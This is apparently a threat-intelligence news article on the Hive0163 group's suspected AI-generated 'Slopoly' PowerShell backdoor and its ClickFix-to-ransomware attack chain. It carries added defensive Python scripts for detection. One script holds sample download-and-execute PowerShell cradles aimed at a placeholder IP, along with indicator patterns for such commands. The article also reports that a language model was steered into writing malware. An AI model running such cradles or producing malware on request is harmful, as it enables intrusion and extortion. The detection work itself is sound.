Hive0163 Ransomware Operators Deploy AI-Generated Slopoly Malware in Sophisticated Attack

Researchers have identified a case of suspected AI-generated malware, known as “Slopoly,” utilized in a ransomware attack linked to the financially motivated cybercrime group Hive0163. This development indicates a potential shift in tactics among cybercriminals, who are beginning to integrate AI-generated tools into their operations.

Hive0163 and the Experimentation with AI-Generated Malware

Hive0163 is a collective of threat actors recognized for orchestrating ransomware campaigns focused on large-scale data theft and extortion. The group has been implicated in various global ransomware incidents, including those involving Interlock ransomware, as well as custom backdoors and loaders such as NodeSnake, InterlockRAT, and the JunkFiction loader.

In early 2026, IBM X-Force analysts uncovered that Hive0163 deployed Slopoly, a suspected AI-generated malware framework designed to ensure persistent access to compromised servers. The investigation revealed that the attackers maintained access to the infected machine for over a week using this malware.

Notably, Slopoly was employed during the latter stages of the attack, suggesting that the operators were testing the AI-generated framework in a real-world scenario. Researchers characterized the situation as akin to a “live-fire exercise,” where the threat actors experimented with the new tool during an active operation.

The variable naming conventions within the script indicated that the code generation system was explicitly instructed to produce malicious functionality. This raises concerns that any safety measures implemented in the underlying AI model were effectively bypassed. Although researchers could not identify the specific model that generated Slopoly, the overall quality suggested it was likely produced by a less advanced system.

Slopoly as a Suspected LLM-Generated C2 Tool

The Slopoly malware was discovered as a PowerShell script on an infected server. Analysis revealed that it functioned as the client component of a command-and-control (C2) framework utilized by Hive0163. Investigators believe the malware was generated through a builder tool that automatically inserted configuration data, including session IDs, mutex names, C2 server addresses, and beacon intervals. The builder reportedly deployed Slopoly into the directory C:\ProgramData\Microsoft\Windows\Runtime and established persistence by creating a scheduled task named “Runtime Broker.”
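The scheduled-task persistence described above is the kind of artifact a responder can sweep for in Windows Security event 4698 (scheduled task created) records, which carry the task definition XML in their TaskContent field. The Python script below is an added example written for this page, not IBM X-Force tooling or anything recovered from Hive0163: it parses that XML and flags a root-level task named after a Windows component (“Runtime Broker” imitates the legitimate RuntimeBroker.exe process) that launches a script interpreter from a user-writable directory with window-hiding or policy-bypass switches. The sample events, the PowerShell arguments and the script file name client.ps1 are constructed assumptions; only the task name and the directory come from the article.

```python
"""Triage Windows Security event 4698 records for Slopoly-style persistence:
a script interpreter started by a task with a Windows-sounding name from a
user-writable directory. Added example; samples are constructed."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
INTERPRETERS = ("powershell", "pwsh", "cmd", "wscript", "cscript", "mshta", "rundll32")
USER_WRITABLE = re.compile(r"\\(?:ProgramData|Users|Temp|AppData)\\", re.IGNORECASE)
HIDING_FLAGS = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|nop\b|noprofile\b|e(?:xecutionpolicy|p)\s+bypass"
    r"|(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Task names that imitate legitimate Windows components. "Runtime Broker" is the
# name from the report; it mimics the real RuntimeBroker.exe process.
MIMICKED_NAMES = {"runtime broker"}

# Constructed sample events. Field names follow the 4698 schema; the PowerShell
# arguments and client.ps1 are assumptions, not details from the report.
SAMPLE_EVENTS = [
    {"TaskName": r"\Runtime Broker", "SubjectUserName": "websvc",
     "TaskContent": r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-WindowStyle Hidden -ExecutionPolicy Bypass -File C:\ProgramData\Microsoft\Windows\Runtime\client.ps1</Arguments>
    </Exec>
  </Actions>
</Task>"""},
    {"TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag", "SubjectUserName": "SYSTEM",
     "TaskContent": r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>%windir%\system32\defrag.exe</Command>
      <Arguments>-c -h -o -$</Arguments>
    </Exec>
  </Actions>
</Task>"""},
]


def task_actions(task_content):
    """Return (command, arguments) pairs from the task XML in TaskContent."""
    # Exported TaskContent keeps its UTF-16 declaration; drop it before parsing str.
    xml_text = re.sub(r"^\s*<\?xml[^>]*\?>", "", task_content)
    root = ET.fromstring(xml_text)
    pairs = []
    for exec_el in root.iterfind(".//t:Actions/t:Exec", NS):
        command = exec_el.findtext("t:Command", default="", namespaces=NS).strip()
        arguments = exec_el.findtext("t:Arguments", default="", namespaces=NS).strip()
        pairs.append((command, arguments))
    return pairs


def assess_task_event(event):
    """Reasons this 4698 event looks like Slopoly-style persistence ([] if none)."""
    reasons = []
    name = event["TaskName"].lstrip("\\")
    # Vendor tasks live in folders (\Microsoft\Windows\...); a bare root-level
    # task that borrows a Windows component name is the suspicious shape.
    if "\\" not in name and name.lower() in MIMICKED_NAMES:
        reasons.append(f"root-level task imitating a Windows component: {name!r}")
    for command, arguments in task_actions(event["TaskContent"]):
        exe = command.lower().rsplit("\\", 1)[-1]
        if not exe.startswith(INTERPRETERS):
            continue
        if USER_WRITABLE.search(arguments):
            reasons.append(f"{exe} runs content from a user-writable path")
        if HIDING_FLAGS.search(arguments):
            reasons.append(f"{exe} launched with window-hiding or policy-bypass flags")
    return reasons


def triage(events):
    """Map TaskName -> reasons for every event that raised at least one."""
    return {e["TaskName"]: r for e in events if (r := assess_task_event(e))}


if __name__ == "__main__":
    for task, reasons in triage(SAMPLE_EVENTS).items():
        print(task)
        for reason in reasons:
            print("  -", reason)
```

The same logic applies to the output of `schtasks /query /xml` on a live host, since it emits the identical task XML; the 4698 route is preferable during an incident because it also records who created the task and when.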

Several characteristics strongly suggest that Slopoly was produced using a large language model. The script featured extensive comments, structured logging functions, clear error handling routines, and well-named variables—traits commonly associated with AI-generated malware and AI-assisted programming.

Another indication of AI-assisted development was the presence of an unused “Jitter” function within the code, which researchers believe may have been a remnant from iterative development with a language model. Interestingly, the script’s internal comments referred to it as a “Polymorphic C2 Persistence Client.” However, the malware does not exhibit true polymorphic behavior; it cannot modify its own code during execution. Instead, the builder likely generates new variants of the malware with randomized configuration values and function names, a common technique among malware developers.

How Slopoly Operates on Infected Systems

Despite its limited sophistication, Slopoly functions as a working backdoor. Upon execution, it collects basic system information from the infected machine and transmits it to a remote command-and-control server. The data is sent in JSON format using an HTTP POST request to the /api/commands endpoint. Typical beacons include information such as the public IP address of the infected system, user account names, computer names, and whether the process is running with elevated privileges.

The malware sends heartbeat messages every 30 seconds and checks for new commands approximately every 50 seconds. Any instructions received from the C2 server are executed using cmd.exe, with the results sent back to the server. Additionally, Slopoly maintains a detailed log file named persistence.log, which records activity and rotates once it reaches a size of 1 MB.
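Because Slopoly beacons on fixed 30-second and roughly 50-second timers and its Jitter function is never called, its traffic is unusually regular, and that regularity is the easiest thing to catch from the network side. The Python below is an added example written for this page, not X-Force code: it groups requests in a constructed proxy log by client, method, host and path, measures the inter-arrival gaps and flags any series whose gaps cluster within 10% of their median. The log format, the addresses and the thresholds are assumptions chosen for the example.

```python
"""Find fixed-interval beaconing in a web-proxy log. Added example; the log
format and every address below are constructed, not taken from the report."""
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

TS_FMT = "%Y-%m-%dT%H:%M:%SZ"
T0 = datetime(2026, 2, 3, 10, 0, 0)


def _line(when, src, method, host, path, status=200):
    return f"{when:{TS_FMT}} {src} {method} {host} {path} {status}"


def build_sample_log():
    """Constructed log: 12 Slopoly-style POSTs every 30 s from 10.0.5.21, plus
    ordinary browsing from 10.0.5.40 with irregular gaps."""
    lines = [_line(T0 + timedelta(seconds=30 * i), "10.0.5.21", "POST",
                   "203.0.113.10", "/api/commands") for i in range(12)]
    when = T0
    for gap in (0, 7, 95, 3, 41, 12, 180, 2, 66, 30, 31, 29):
        when += timedelta(seconds=gap)
        lines.append(_line(when, "10.0.5.40", "GET", "www.example.com", "/news"))
    return sorted(lines)


def parse_log(lines):
    """Group request timestamps by (src, method, host, path)."""
    series = defaultdict(list)
    for line in lines:
        ts, src, method, host, path, _status = line.split()
        series[(src, method, host, path)].append(datetime.strptime(ts, TS_FMT))
    return series


def regularity(times, tolerance=0.10):
    """Return (median gap in seconds, fraction of gaps within +/-tolerance of
    the median), or None when there are too few requests to judge."""
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if len(gaps) < 5:
        return None
    median = statistics.median(gaps)
    if median <= 0:
        return None
    within = sum(1 for g in gaps if abs(g - median) <= tolerance * median)
    return median, within / len(gaps)


def find_beacons(lines, min_requests=6, min_regularity=0.8):
    """Series with at least min_requests hits whose gaps are regular enough to
    look timer-driven rather than human-driven."""
    hits = []
    for (src, method, host, path), times in parse_log(lines).items():
        stats = regularity(times)
        if stats is None or len(times) < min_requests:
            continue
        median, fraction = stats
        if fraction >= min_regularity:
            hits.append({"src": src, "method": method, "host": host, "path": path,
                         "interval_s": median, "regularity": round(fraction, 2)})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(build_sample_log()):
        print(f"{hit['src']} -> {hit['method']} {hit['host']}{hit['path']} "
              f"every ~{hit['interval_s']:.0f}s (regularity {hit['regularity']})")
```

Anything else on a timer (monitoring agents, update checks, SaaS sync clients) will also score high, so the hits need a baseline of known-good destinations. The check also relies on the builder having left the jitter out; a variant that randomizes its sleep would need a wider tolerance or an autocorrelation-based test. On the host, the matching signal is a PowerShell process started by the scheduled task repeatedly spawning cmd.exe for each received command.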

Initial Infection Through ClickFix

The attack investigated by researchers commenced with a social engineering technique known as ClickFix. This method deceives victims into executing malicious PowerShell commands themselves. Victims are typically presented with a CAPTCHA-style verification page that secretly copies a malicious script into the clipboard. The page instructs users to press a sequence of keyboard commands—“Win+R” to open the Windows Run dialog, followed by “Ctrl+V” to paste the script and “Enter” to execute it.
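Since ClickFix depends on the victim typing the payload into the Run dialog, Explorer's RunMRU key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) keeps a copy of exactly what was run, which makes it a good place to look during triage. The Python script below is an added example written for this page, not part of the report: it takes RunMRU values (exported, for example, with reg query; Explorer stores each with a trailing \1), decodes any -EncodedCommand payload (base64 over UTF-16LE) and scores download-and-execute indicators. All sample commands and the 198.51.100.7 address are constructed, and the indicator list is the editor's, not a signature from the report.

```python
r"""Triage commands pasted into the Windows Run dialog (ClickFix). Added
example; the RunMRU values below are constructed samples."""
import base64
import re

# (pattern, label): searched case-insensitively over the command and any decoded payload
INDICATORS = [
    (r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|curl|wget)\b", "web download"),
    (r"\b(?:iex|invoke-expression)\b", "in-memory execution"),
    (r"downloadstring|downloadfile", "WebClient download"),
    (r"\bmshta\b|\.hta\b", "mshta/HTA launch"),
    (r"-w(?:indowstyle)?\s+h(?:idden)?\b", "hidden window"),
    (r"-(?:nop|noprofile)\b|-(?:ep|executionpolicy)\s+bypass", "profile/policy bypass"),
]
# powershell.exe accepts any unambiguous prefix of -EncodedCommand
ENCODED = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_powershell(script):
    """Produce the -EncodedCommand form (base64 over UTF-16LE). Used here only
    to build a realistic constructed sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmd):
    """Return the decoded script if cmd carries an -EncodedCommand blob, else None."""
    m = ENCODED.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_run_command(raw):
    """Assess one RunMRU value (or any Run-dialog command line)."""
    cmd = raw[:-2] if raw.endswith("\\1") else raw  # strip Explorer's "\1" suffix
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else f"{cmd}\n{decoded}"
    findings = [label for pat, label in INDICATORS if re.search(pat, text, re.I)]
    return {"command": cmd, "decoded": decoded, "findings": findings,
            # a single cradle verb shows up in admin use; two or more together is the ClickFix shape
            "suspicious": len(findings) >= 2}


SAMPLES = [
    # plain cradle with the "verification" comment ClickFix pages append to reassure the victim
    r'powershell -w hidden -c "iwr http://198.51.100.7/v.ps1 | iex" # I am not a robot - reCAPTCHA Verification ID: 3912\1',
    # same cradle hidden behind -EncodedCommand
    "powershell -nop -enc " + encode_powershell("iex (iwr http://198.51.100.7/v.ps1)") + r"\1",
    # benign entry
    r"notepad\1",
]

if __name__ == "__main__":
    for raw in SAMPLES:
        result = triage_run_command(raw)
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{flag:10} {result['command'][:60]!r} {result['findings']}")
```

RunMRU only records what went through the Run dialog; the same check is worth running over PowerShell script-block logs (event 4104) and process-creation events, since Windows records the decoded command there even when the user pasted it into a terminal instead.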

Once executed, the PowerShell payload installs NodeSnake, a Node.js-based malware that serves as the first stage of a larger command-and-control framework utilized by Hive0163. NodeSnake supports multiple commands, including downloading and executing payloads, running shell commands, establishing persistence, updating itself, and terminating its own process.

In the observed attack, NodeSnake eventually deployed a more advanced JavaScript-based backdoor known as InterlockRAT, which supports WebSocket communications, reverse shell access, and SOCKS5 tunneling capabilities.

Ransomware Deployment and Encryption

The final stage of the intrusion involved deploying Interlock ransomware, packaged using the JunkFiction loader. Once executed, the ransomware scans logical drives and encrypts targeted files across the system. Interlock uses a hybrid scheme built on the OpenSSL library (version 3.5.0): each file is encrypted with a unique AES-GCM session key, and that key is in turn wrapped with an attacker-controlled RSA public key, so recovering the files requires the attackers' corresponding private key.

Encrypted files are typically renamed with extensions such as .!NT3RLOCK or .int3R1Ock. After completing the encryption process, the ransomware drops a ransom note, often named FIRST_READ_ME.txt, containing instructions for victims to contact the attackers.

As reported by thecyberexpress.com, this incident underscores the evolving tactics of cybercriminals, particularly in their use of AI-generated tools to enhance their operational capabilities.
